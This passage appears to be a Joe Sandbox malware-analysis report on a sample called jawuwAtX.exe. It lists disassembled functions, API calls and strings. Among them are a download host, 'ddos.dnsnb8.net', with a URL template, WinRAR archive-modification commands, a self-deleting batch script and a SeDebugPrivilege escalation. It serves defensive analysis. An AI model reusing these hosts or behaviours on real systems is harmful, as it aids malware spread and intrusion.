                              • Opcode ID: f86b473c1f5a289d7981817a9fa99fa68263759babc4bc281a1cd033b3dff3f7
                              • Instruction ID: cffc1866f63e24fec1dde6a4af2ed757c41e267a1a813a53d1d6eeabb3abfd9e
                              • Opcode Fuzzy Hash: f86b473c1f5a289d7981817a9fa99fa68263759babc4bc281a1cd033b3dff3f7
                              • Instruction Fuzzy Hash: 220196B160035CBFE7325F60AD88E2BBBACEB44799F01852DF245A2090D7745E458B71

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 322c48-322c75 memset call 321973 377 322cb2-322cb9 374->377 378 322c77-322c7f 374->378 381 322cbb-322cc2 VirtualFree 377->381 382 322cc8-322ccc 377->382 379 322c81-322c8b 378->379 380 322c8f-322cac CreateThread WaitForMultipleObjects 378->380 379->380 380->377 381->382
                              APIs
                              • memset.MSVCRT ref: 00322C57
                                • Part of subcall function 00321973: PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                                • Part of subcall function 00321973: Sleep.KERNEL32(00000064), ref: 003219C6
                                • Part of subcall function 00321973: wsprintfA.USER32 ref: 003219EC
                                • Part of subcall function 00321973: CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                                • Part of subcall function 00321973: GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                                • Part of subcall function 00321973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                                • Part of subcall function 00321973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00322C99
                              • WaitForMultipleObjects.KERNEL32(00000001,003216BA,00000001,000000FF,?,003216BA,00000000), ref: 00322CAC
                              • VirtualFree.KERNEL32(00F80000,00000000,00008000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,00324E5C,00324E60,?,003216BA,00000000), ref: 00322CC2
                              Strings
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 00322C69
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                              • API String ID: 2042498389-3087309112
                              • Opcode ID: 6be91e90b6ff4a6b925affc3818f8cba3f21f56b061b1f1db45b13061b69c8a3
                              • Instruction ID: 39c868ed7e74fa72174b863f2076a589aa5487e34f84b36e9070fff054968bac
                              • Opcode Fuzzy Hash: 6be91e90b6ff4a6b925affc3818f8cba3f21f56b061b1f1db45b13061b69c8a3
                              • Instruction Fuzzy Hash: 2F018F716412347AE722ABA5BC0AEEF7E6CEF01B60F114114FA05D61C1D6A09A40C7F1

                              Control-flow Graph (rendered graph not reproduced in text)
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00321504
                              • VirtualQuery.KERNEL32(003214E1,?,0000001C), ref: 00321525
                              • ExitProcess.KERNEL32 ref: 0032157A
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: ExitHandleModuleProcessQueryVirtual
                              • String ID:
                              • API String ID: 3946701194-0
                              • Opcode ID: 4763c1a1b11838c944d512ac8049c1e748586e9da39cebe7fc64b8162d7ddab6
                              • Instruction ID: 02523fc1b95a6e06c82c8dcfb9c474bbcaaf0f50a8219c5ed4dc16d136bf95aa
                              • Opcode Fuzzy Hash: 4763c1a1b11838c944d512ac8049c1e748586e9da39cebe7fc64b8162d7ddab6
                              • Instruction Fuzzy Hash: 6A118E71941224DFCB33DFA6B984A7D77BCEBA5710F21806EF802E6161D2349943EB60

                              Control-flow Graph (rendered graph not reproduced in text)
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: FileTimememset
                              • String ID:
                              • API String ID: 176422537-0
                              • Opcode ID: eed644b54d4ccaa280eb13fd280953efa55586b6edfa90f140c7f67542a192cc
                              • Instruction ID: edbd73f4113c256199f5551d5f8431325aa51d168386e1a5f8d1c36b98e267e6
                              • Opcode Fuzzy Hash: eed644b54d4ccaa280eb13fd280953efa55586b6edfa90f140c7f67542a192cc
                              • Instruction Fuzzy Hash: 79F06832200219BBD732DE26EC04BA777ACAB60361F11853AF516D5450E730D685DBF0

                              Control-flow Graph (rendered graph not reproduced in text)
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003260DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00326189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003261A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$Free$Alloc
                              • String ID:
                              • API String ID: 1852963964-0
                              • Opcode ID: 03d109255f2ec3bc3c8f16ad4220dd9dc3ff1cec95be8f1217d0da5c35cbf2a0
                              • Instruction ID: 32d6860df4e17176c288a5ba0db7cbea1b4a2d8cb3d0286b74f7e454ddaf71d0
                              • Opcode Fuzzy Hash: 03d109255f2ec3bc3c8f16ad4220dd9dc3ff1cec95be8f1217d0da5c35cbf2a0
                              • Instruction Fuzzy Hash: 7F118F32A00669CFCF328F58DC967DD37A1FF01300F6A4419DE8A5F692DA716954CB94
                              APIs
                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,?,?,003213EF), ref: 003211AB
                              • OpenProcessToken.ADVAPI32(00000000,00000028,003213EF,?,?,?,?,?,?,003213EF), ref: 003211BB
                              • AdjustTokenPrivileges.ADVAPI32(003213EF,00000000,?,00000010,00000000,00000000), ref: 003211EB
                              • CloseHandle.KERNEL32(003213EF), ref: 003211FA
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,003213EF), ref: 00321203
                              Strings
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 003211A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                              • API String ID: 75692138-3087309112
                              • Opcode ID: 17e1c294245c6c2cf8af80b117e52c30c0ba7070be3b5cf75a1b0855c259abd7
                              • Instruction ID: 6cda382a279141423f6850541c9fd7c8cce7986b5c3fbdb4cfb95c4ac1582f49
                              • Opcode Fuzzy Hash: 17e1c294245c6c2cf8af80b117e52c30c0ba7070be3b5cf75a1b0855c259abd7
                              • Instruction Fuzzy Hash: 510124B1900208EFDB11DFE4DD89AAEBBBCFF04304F108469E606A2250D7749F459B60
                              APIs
                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003213BC
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003213DA
                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00321448
                                • Part of subcall function 0032119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,?,?,003213EF), ref: 003211AB
                                • Part of subcall function 0032119F: OpenProcessToken.ADVAPI32(00000000,00000028,003213EF,?,?,?,?,?,?,003213EF), ref: 003211BB
                                • Part of subcall function 0032119F: AdjustTokenPrivileges.ADVAPI32(003213EF,00000000,?,00000010,00000000,00000000), ref: 003211EB
                                • Part of subcall function 0032119F: CloseHandle.KERNEL32(003213EF), ref: 003211FA
                                • Part of subcall function 0032119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,003213EF), ref: 00321203
                              Strings
                              • SeDebugPrivilege, xrefs: 003213D3
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 003213A8
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$SeDebugPrivilege
                              • API String ID: 4123949106-4254696666
                              • Opcode ID: 4d2a5b752bbc508ee27af7450d9263e6c5837f372b28c386ade49817bbb3af71
                              • Instruction ID: a1dfc62d68e24cc6ef1953fc794a909e20c4ddbc4b3db92ef6462c0878094c74
                              • Opcode Fuzzy Hash: 4d2a5b752bbc508ee27af7450d9263e6c5837f372b28c386ade49817bbb3af71
                              • Instruction Fuzzy Hash: 7431D771D00229EADF22EFA6EE45FEFBB78EB54700F21406AE604B6140D7305E45CB60
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction ID: b3afde08f6bed5f881dcc89be0c2a5eeee48eca6a5dbd10ab9cb8fa071d570d0
                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction Fuzzy Hash: 3081D271214B518FC729CF28E8916AAB7E2EFC5314F148A2DD0EAC7B55DB34E809CB44
                              APIs
                              • strstr.MSVCRT ref: 003223CC
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00322464
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00322472
                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 003224A8
                              • memset.MSVCRT ref: 003224B9
                              • strrchr.MSVCRT ref: 003224C9
                              • wsprintfA.USER32 ref: 003224DE
                              • strrchr.MSVCRT ref: 003224ED
                              • memset.MSVCRT ref: 003224F2
                              • memset.MSVCRT ref: 00322505
                              • wsprintfA.USER32 ref: 00322524
                              • Sleep.KERNEL32(000007D0), ref: 00322535
                              • Sleep.KERNEL32(000007D0), ref: 0032255D
                              • memset.MSVCRT ref: 0032256E
                              • wsprintfA.USER32 ref: 00322585
                              • memset.MSVCRT ref: 003225A6
                              • wsprintfA.USER32 ref: 003225CA
                              • Sleep.KERNEL32(000007D0), ref: 003225D0
                              • Sleep.KERNEL32(000007D0,?,?), ref: 003225E5
                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 003225FC
                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00322611
                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00322642
                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0032265B
                              • SetEndOfFile.KERNEL32 ref: 0032266D
                              • CloseHandle.KERNEL32(00000000), ref: 00322676
                              • RemoveDirectoryA.KERNEL32(?), ref: 00322681
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                              • API String ID: 2203340711-774930870
                              • Opcode ID: 02e3b3b9825a92dc6e493dc23ade260a4981e18166217256324179605ffb615f
                              • Instruction ID: d736c5492a38b635992968dea8212b1c5f33300338208e47ed433d03e3a8569c
                              • Opcode Fuzzy Hash: 02e3b3b9825a92dc6e493dc23ade260a4981e18166217256324179605ffb615f
                              • Instruction Fuzzy Hash: D381A0B2504314BBD722DF60EC49EABB7ACFF88714F00491EF645D21A0D7749A498BA6
                              APIs
                              • memset.MSVCRT ref: 00322766
                              • memset.MSVCRT ref: 00322774
                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00322787
                              • wsprintfA.USER32 ref: 003227AB
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • wsprintfA.USER32 ref: 003227C6
                              • CopyFileA.KERNEL32(?,00324C80,00000000), ref: 003227D4
                              • wsprintfA.USER32 ref: 003227F4
                                • Part of subcall function 00321973: PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                                • Part of subcall function 00321973: Sleep.KERNEL32(00000064), ref: 003219C6
                                • Part of subcall function 00321973: wsprintfA.USER32 ref: 003219EC
                                • Part of subcall function 00321973: CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                                • Part of subcall function 00321973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                                • Part of subcall function 00321973: GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                                • Part of subcall function 00321973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                                • Part of subcall function 00321973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • DeleteFileA.KERNEL32(?,?,00324E54,00324E58), ref: 0032281A
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00324E54,00324E58), ref: 00322832
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                              • API String ID: 692489704-3099098879
                              • Opcode ID: 9f9555d6f63364a27ea091357ad5e509de1c0e75f9a67d11152ede126504c5f5
                              • Instruction ID: c294f5c119c0adbeb68356ca9172344c34c273c0f198eff750fa76649448f6f6
                              • Opcode Fuzzy Hash: 9f9555d6f63364a27ea091357ad5e509de1c0e75f9a67d11152ede126504c5f5
                              • Instruction Fuzzy Hash: 7C2130B694033C7BEB12E7A4BD89EEB776CEB14754F0005A5F645E2041E674DF848AB0
                              APIs
                                • Part of subcall function 0032185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321878
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321880
                                • Part of subcall function 0032185B: srand.MSVCRT ref: 00321890
                                • Part of subcall function 0032185B: rand.MSVCRT ref: 00321894
                              • wsprintfA.USER32 ref: 003215AA
                              • wsprintfA.USER32 ref: 003215C6
                              • lstrlen.KERNEL32(?), ref: 003215D2
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 003215EE
                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00321609
                              • CloseHandle.KERNEL32(00000000), ref: 00321612
                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0032162D
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$open
                              • API String ID: 617340118-1123926669
                              • Opcode ID: 8bad05ccdaaf56f69882d4f2941e83b6589fa909c058049e10b9726ecb2f3196
                              • Instruction ID: bb360945e3f404b004d4411075f6042f08d7951c5bc94030567ae8aa9b574ce1
                              • Opcode Fuzzy Hash: 8bad05ccdaaf56f69882d4f2941e83b6589fa909c058049e10b9726ecb2f3196
                              • Instruction Fuzzy Hash: 311173B6A011387BD722A7A4AC89DEB7B6CEF59750F000051F94AE2040DA74AB85CBB0
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00321400), ref: 00321226
                              • GetProcAddress.KERNEL32(00000000), ref: 0032122D
                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00321400), ref: 0032123F
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00321400), ref: 00321250
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 0032129E
                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 003212B0
                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,?,?,?,?,00321400), ref: 003212F5
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00321400), ref: 0032130A
                              Strings
                              • ntdll.dll, xrefs: 00321219
                              • ZwQuerySystemInformation, xrefs: 00321212
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 00321262
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$ZwQuerySystemInformation$ntdll.dll
                              • API String ID: 1500695312-3029884969
                              • Opcode ID: 028957f4c95032e802e353f1906c966e7bba826a4dfd5831b256846def512dcb
                              • Instruction ID: 7d226d33c09505f9db7efae94e91f6ed13ed23d70c036b6e5ec1a9647d78449e
                              • Opcode Fuzzy Hash: 028957f4c95032e802e353f1906c966e7bba826a4dfd5831b256846def512dcb
                              • Instruction Fuzzy Hash: 7C21F031645321EBD7329B64EC08FABBAACFB95B00F014D1CF646E6280C774DA41CBA5
                              APIs
                              • memset.MSVCRT ref: 003218B1
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 003218D3
                              • CloseHandle.KERNEL32(I%2), ref: 003218E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003218F0
                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00321901
                              • CloseHandle.KERNEL32(?), ref: 0032190A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                              • String ID: I%2
                              • API String ID: 876959470-2687430202
                              • Opcode ID: 0f44fa39909146e34870787e8dff9cf4e3c0039d2505766a1d5da7650fa8e686
                              • Instruction ID: 3484249f95b287d070ab3caca2f2b5f7b9c47b56030d2c41f54008806c128a28
                              • Opcode Fuzzy Hash: 0f44fa39909146e34870787e8dff9cf4e3c0039d2505766a1d5da7650fa8e686
                              • Instruction Fuzzy Hash: 85017172901128BBCB226B95EC48DDF7F3DFF85730F104025F916A51A0D6354A59CAA0
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                              • srand.MSVCRT ref: 00321878
                              • rand.MSVCRT ref: 00321880
                              • srand.MSVCRT ref: 00321890
                              • rand.MSVCRT ref: 00321894
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Timerandsrand$FileSystem
                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 4106363736-3273462101
                              • Opcode ID: 8c053969a0b227cc7842d3410177235bfa8db6958952174166a7e5ccfe775e15
                              • Instruction ID: adae1bb91e573a3141051523db8a0d9f0189fcee7ad4858a571e3f6c7a5307e6
                              • Opcode Fuzzy Hash: 8c053969a0b227cc7842d3410177235bfa8db6958952174166a7e5ccfe775e15
                              • Instruction Fuzzy Hash: 9FE0D877A00218BBD710A7F9FC4689EBBACDF84261F10052BF601D3250E974FD458AB4
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,003229DB,?,00000001), ref: 003226A7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,003229DB,?,00000001), ref: 003226B5
                              • lstrlen.KERNEL32(?), ref: 003226C4
                              • ??2@YAPAXI@Z.MSVCRT ref: 003226CE
                              • lstrcpy.KERNEL32(00000004,?), ref: 003226E3
                              • lstrcpy.KERNEL32(?,00000004), ref: 0032271F
                              • ??3@YAXPAX@Z.MSVCRT ref: 0032272D
                              • SetEvent.KERNEL32 ref: 0032273C
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 41106472-0
                              • Opcode ID: 41800e4c9f8add10a00b615969736c3923428a10d6804466cc4c2afa688ba53e
